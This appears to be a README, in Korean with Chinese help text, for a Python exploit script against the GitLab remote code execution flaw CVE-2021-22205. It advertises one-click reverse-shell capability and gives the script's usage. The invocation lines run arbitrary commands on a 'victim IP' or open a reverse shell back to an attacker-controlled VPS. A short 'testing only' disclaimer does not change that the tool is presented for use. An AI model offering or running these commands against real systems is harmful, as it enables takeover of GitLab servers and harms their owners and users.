
명령 실행 및 리버스 셸 기능을 갖춘 CVE-2021-22205(GitLab RCE)용 Python 익스플로잇 스크립트입니다. 침투 테스트를 위한 원클릭 getshell을 지원합니다.
GitLab이 파일 파서로 전달되는 이미지 파일을 올바르게 검증하지 않아 명령 실행이 발생합니다. 공격자는 악의적인 요청을 구성하여 이 취약점을 이용해 대상 시스템에서 임의의 명령을 실행할 수 있으며, 결국 GitLab 서버가 장악될 수 있습니다. 인터넷에 공개된 대부분의 스크립트에는 리버스 셸(reverse shell) 기능이 없어서, 공개된 스크립트를 수정하여 원클릭 getshell 기능을 추가했습니다.
______ _______ ____ ___ ____ _ ____ ____ ____ ___ ____
/ ___\ \ / / ____| |___ \ / _ \___ \/ | |___ \|___ \|___ \ / _ \| ___|
| | \ \ / /| _| _____ __) | | | |__) | |_____ __) | __) | __) | | | |___ \
| |___ \ V / | |__|_____/ __/| |_| / __/| |_____/ __/ / __/ / __/| |_| |___) |
\____ | \_/ |_____| |_____|\___/_____|_| |_____|_____|_____|\___/|____/
usage: CVE-2021-22205.py [-h] [-t TARGET] [-c COMMAND] [--shell] [-i IP]
[-p PORT]
GitLab < 13.10.3 RCE
optional arguments:
-h, --help show this help message and exit
-t TARGET, --target TARGET
目标URL
-c COMMAND, --command COMMAND
执行命令
--shell 是否反弹shell
-i IP, --ip IP 反弹shell ip
-p PORT, --port PORT 反弹shell端口
python3 CVE-2021-22205.py -t [受害者ip] --shell -i [vps ip] -p [vps port] //反弹shell
python3 CVE-2021-22205.py -t [受害者ip] -c [command] //执行命令
이 스크립트는 테스트 용도로만 사용할 수 있으며, 다른 용도로 사용하지 마십시오.